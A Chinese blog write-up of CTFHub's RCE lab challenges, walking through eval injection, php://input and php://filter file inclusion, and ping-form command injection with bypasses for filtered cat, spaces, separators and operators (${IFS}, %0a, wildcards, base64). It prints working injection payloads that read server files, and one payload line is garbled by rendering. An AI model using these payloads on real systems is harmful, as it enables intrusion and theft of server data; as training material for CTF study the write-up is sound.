CTFHUB之RCE(特详解)

最新推荐文章于 2024-08-21 13:55:02 发布
最新推荐文章于 2024-08-21 13:55:02 发布
阅读量3.8k 收藏 32
点赞数 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/117933613
版权

CTFHUB之RCE

1.eval执行

1.先看一下靶机环境

在这里插入图片描述

2.先看一下php代码,这里要求将命令赋值给cmd然后执行

先看一下根目录文件/?cmd=system(“ls”);

这里的分号不能省略

在这里插入图片描述

没有有用的文件。查看上一级的文件夹/?cmd=system(“ls %20/”);

在这里插入图片描述

3.这里在进行抓取flag片段/?cmd=system(“cat%20/flag_29475”);

在这里插入图片描述

2.文件包含

1.先看靶机环境,点击shell会出现以下的页面,然后使用火狐的hackbar来进行postdata的注入,这个如上,

这里先查看上个目录

在这里插入图片描述

2.上个目录没有得到想要的,查看上个目录。

在这里插入图片描述

3.查看flag

在这里插入图片描述

php://input

这里先了解一下php://input

php://用来访问各个输入/输出流

php://input是个可以访问请求的原始数据的只读流,可以接收post请求作为输入流的输入,将请求作为PHP代码输入,以达到以post的形式进行输入的目的

1.开始做题,先看一眼靶机环境

在这里插入图片描述

2.点击phpinfo查看配置

在这里插入图片描述

发现这个的开关是开的,说明可以使用php://input

3.使用bp抓包,放到重发器中

在这里插入图片描述

4.这里修改发送方法为post,目标修改为/?file=php://input

将body换成<?php system('ls /');?>查看上一级文件

在这里插入图片描述

5.这里修改body为

<?php system('cat /flag_23020');?> 访问flag

在这里插入图片描述

远程包含

1.先查看靶机环境
在这里插入图片描述

2.查看配置文件,发现能够使用php://input

在这里插入图片描述

3.构造payload,查看上一级文件

在这里插入图片描述

4.查看flag

在这里插入图片描述

读取源代码

1.这里照常使用构造payload来访问上一级文件

在这里插入图片描述

发现没有反应

2.这里了解一下php://filter

php://filter是一种元封装器,设计用来数据流打开是的筛选过滤应用。这对于一体式的文件函数非常有用。

php://filter目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定。

这里可以使用filter将源代码通过base64回显

payload

http://URL/?file=php://filter/read=convert.base64-encode/resource=…/…/…/flag

在这里插入图片描述

3.找在线解码

在这里插入图片描述

命令注入

1.题目提示这个是测试网络延迟的平台,路由器中会经常出现。

打开题目后输入127.0.0.1

这里需要了解一下linux中命令的链接符号

1.每个命令之间用;隔开
说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。
2.每个命令之间用&&隔开
说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。
3.每个命令之间用||隔开
说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。

4.| 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。

5.& 是后台任务符号。 后台任务符号使shell在后台执行该任务,这样用户就可以立即得到一个提示符并继续其他工作。
使用&连接符,连接别的命令试一下,发现也执行了后面的命令,且文件夹下有个php文件

127.0.0.1 & ls

在这里插入图片描述

127.0.0.1 & cat 2837021164864.php

在这里插入图片描述

发现打不开PHP文件

这里用管道符来进行base64解密、

127.0.0.1 & cat 2837021164864.php | base64

在这里插入图片描述

进行解码

在这里插入图片描述

过滤cat

根据题目提示这里过滤了cat

在这里插入图片描述

1.这里直接访问上一个目录

在这里插入图片描述

2.这里找到了flag所在的文件位置,这里过滤了cat,无法使用cat,这里补充一下

linux查看文本的命令

cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
这里我使用的是more来查看文件

127.0.0.1 & more flag_31842143531286.php | base64来进行解码

在这里插入图片描述

3.解码找flag

在这里插入图片描述

过滤空格

这里查看源代码,发现过滤了空格

在这里插入图片描述

1.先查看上级文件 127.0.0.1&ls

在这里插入图片描述

2.这里可以通过<来代替空格127.0.0.1&cat<flag|base64

在这里插入图片描述

3.解码

在这里插入图片描述

过滤目录分隔符

1.先查看源代码,然后试着查看上一级的文件,127.0.0.1;ls,发现了flag_is_here.再查看上一级的文件。12.0.0.1;cd flag_is_here;ls

在这里插入图片描述

2.查看存放flag的文件

12.0.0.1;cd flag_is_here;cat flag_4635141399483.php|base64

在这里插入图片描述

3.解码

在这里插入图片描述

过滤运算符

这里先查看一下源代码,过滤了运算符,无法使用| base64

在这里插入图片描述

1.这里先查看上一级文件 127.0.0.1;ls

在这里插入图片描述

2.这里可以这样输入12.0.0.1 ; base64 flag_27475302269053.php

在这里插入图片描述

3.解码

在这里插入图片描述

综合过滤练习

查看源代码,过滤了| & ; cat flag ctfhub 空格
在这里插入图片描述

空格可以用${IFS}

cat可以用more f

lag可以用正则f***

ctfhub应该用不到 查了一下,

在linux下,命令分隔符除了;还有%0a

有了;就可以不用运算符了

这里因为%0a是url编码,所以要输入到url中,否则会被二次编码

在url输入?ip=127.0.0.1%0als#查看上一级文件

在这里插入图片描述

查看flag_is_here

?ip=127.0.0.1%0acd[]{IFS}f***_is_here[]{IFS}%0als这里因为$存在显示问题所以用[]代替
在这里插入图片描述

查看flag文件

?ip=127.0.0.1%0acd[]{IFS}f***_is_here[]{IFS}%0abase64 I F S f ∗ ∗ ∗ ∗ ∗ 2 46102198712264. p h p 这 里 和 上 面 一 样 用 [ ] 代 替 了 {IFS}f_*****_246102198712264.php 这里和上面一样用[]代替了 IFSf246102198712264.php[]
在这里插入图片描述

解码

在这里插入图片描述

小宇特详解
关注
CTFHubRCE - 文件包含
cx_sam的博客
08-07 1767
CTF WEB RCE 文件包含
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1118
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
ctfhubRCE通关
01-28 1207
ctfhubRCE通关记录:命令注入、过滤cat、过滤空格、过滤目录分隔符、过滤运算符、综合过滤练习。
ctfshow每周大挑战之RCE极限挑战
最新发布
qq_53058639的博客
08-21 690
php的eval()解释:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。return 语句会立即终止对字符串的计算。返回值:除非在代码字符串中调用 return 语句,则返回传给 return 语句的值,否则返回 NULL。如果代码字符串中存在解析错误,则 eval()函数返回 FALSE。
CTFHub:Rce
2301_80911344的博客
04-06 1165
RCE,即远程代码执行(Remote Code Execution),是指攻击者通过网络向目标计算机发送恶意指令或代码,成功地在目标计算机上远程执行这些指令或代码的能力。RCE是一种严重的安全漏洞,因为它允许攻击者在没有物理接触或认证的情况下控制另一台计算机。获取系统的控制权限。改变或破坏数据。启动或终止进程。在受影响的系统上安装恶意软件。监视用户行为或窃取敏感信息。因为RCE能够提供如此高级的控制权限,所以这类漏洞通常被认为是非常严重的,并且在被发现后应该立即修补。
CTFHub-rce
CN天狼
02-19 1376
CTFHub-rce
CTFHUB-RCE
cainiao17441898的博客
03-14 356
eval执行 查看源码后发现。让把命令赋值给cmd然后执行 先看一下根目录下有什么,命令:?cmd=system(‘ls’); 再回到上一级看看。发现了flag 打开flag就行了。
CTFhub-RCE
weixin_51706044的博客
06-01 725
文章目录一、命令注入过滤cat过滤空格 一、命令注入 既然提示输入IP让我们输入本地试试 127.01.01.1 得到显示后,尝试得到该路径下文件 127.01.01.1&ls 获取文件内容信息 127.01.01.1&cat 120731029228103.php 没有结果,这里可能是文件中包含殊符号,使用管道运行base64加密内容 127.01.01.1&cat *.php | base64 尝试base64解密 这里还有第二种方法,利用命令执行写入一句
ctfhub web技能树
gh0stf1re的博客
08-30 621
ctfhub web技能树 前言 其实很多题之前已经做过了,但是感觉自己没有吃透吧,只是以做题为目的。所以打算重新做一下,加深一下印象,另外,把知识点也整理一下。 Web前置技能 HTTP协议 请求方式 这时我们采用的http方法是get方法,提示我们采用CTFHUB方法 方法1:利用burp更改请求方式 方法2:使用curl(curl是http神器) curl的用法指南——阮一峰 windows下有一个自带curl的终端神器——cmder,完整版还带有git,非常推荐,具体使用及配置可以参考这几篇
CTFHUB学习题解Web(3)- 密码口令与XSS
独沐晨霖
07-23 1606
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录密码口令弱口令默认口令XSS反射型 密码口令 弱口令 并不知道用户名和密码,用burp抓包 对用户名和密码进行cluster bomb模式爆破 爆破成功得到flag 默认口令 既然是默认口令就要查找这个“eYou邮件网关”的默认用户名和密码 登
CTFHUB学习题解Web(2)- 信息泄露(持续更新整理)
独沐晨霖
07-23 1441
注: 1.我是脚本小子 我连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录信息泄露部分目录遍历PHPINFO备份文件下载网站源码.bak文件vim缓存.DS_Storegit泄露log 信息泄露部分 目录遍历 目录遍历就是为了让我们练习翻看网站文件?hhhh flag就在目录里,没啥好说的 PHPINFO 教看phpinf
CTFHUB学习题解Web(4)-文件上传
独沐晨霖
07-28 663
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录无验证前端验证.htaccessMIME绕过文件头检查00截断双写后缀 无验证 无验证没啥说的,上传php脚本用蚁剑链接即可 前端验证 php文件不允许上传 查看网页源码 将脚本后缀改为.jpg上传并抓包把后缀名改回.php即可上传 用蚁剑连
CTFHub----RCE
qq_44418229的博客
06-09 578
CTFHub----RCE
CTFHUB 文件包含 RCE
nai_kai的博客
06-17 5934
CTFHUB 文件包含 ctfhub RCE 文件包含 write up 审计一下代码,铁铁们可以百度一下strpos()的漏洞哦 #函数查找字符串在另一字符串中第一次出现的位置(区分大小写) strpos("You love php, I love php too!","php"); “我有一个shell,怎么用?” 这个是题目给的包含文件 #request = post + get 于是构造payload,往ctfhub里传参 http://challenge-2bfb323ac5bd651f
ctfhub RCE
2202_75317918的博客
01-27 1067
ctfhub rce
CTFHub 技能树-- RCE详解
m0_62879498的博客
02-20 5890
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
linux中的链接符号
m0_55754984的博客
09-13 657
1.每个命令之间用;隔开 说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.每个命令之间用&&隔开 说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.每个命令之间用||隔开 说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。 5. & 是后台任务符号。
CTFHubRCE
cxiaodi的博客
05-07 1544
ctfhubRCE专题)
ctfhubRCE命令注入
weixin_43326436的博客
06-12 1934
一.实验环境ctfhub RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 LINUX系统的管道符: 1," ; ": 执行完前面的语句在执行后面的语句。 2.“ | “: 显示后面的语句的执行结果。 3.” || “:当前的语句执行出错时,
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域别重要。 请注意,RCE是一种违法行为,在未经授权的情况下进行RCE攻击是被禁止的。在学习过程中,请遵循合法和道德准则,并严禁将所学技术用于非法用途。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值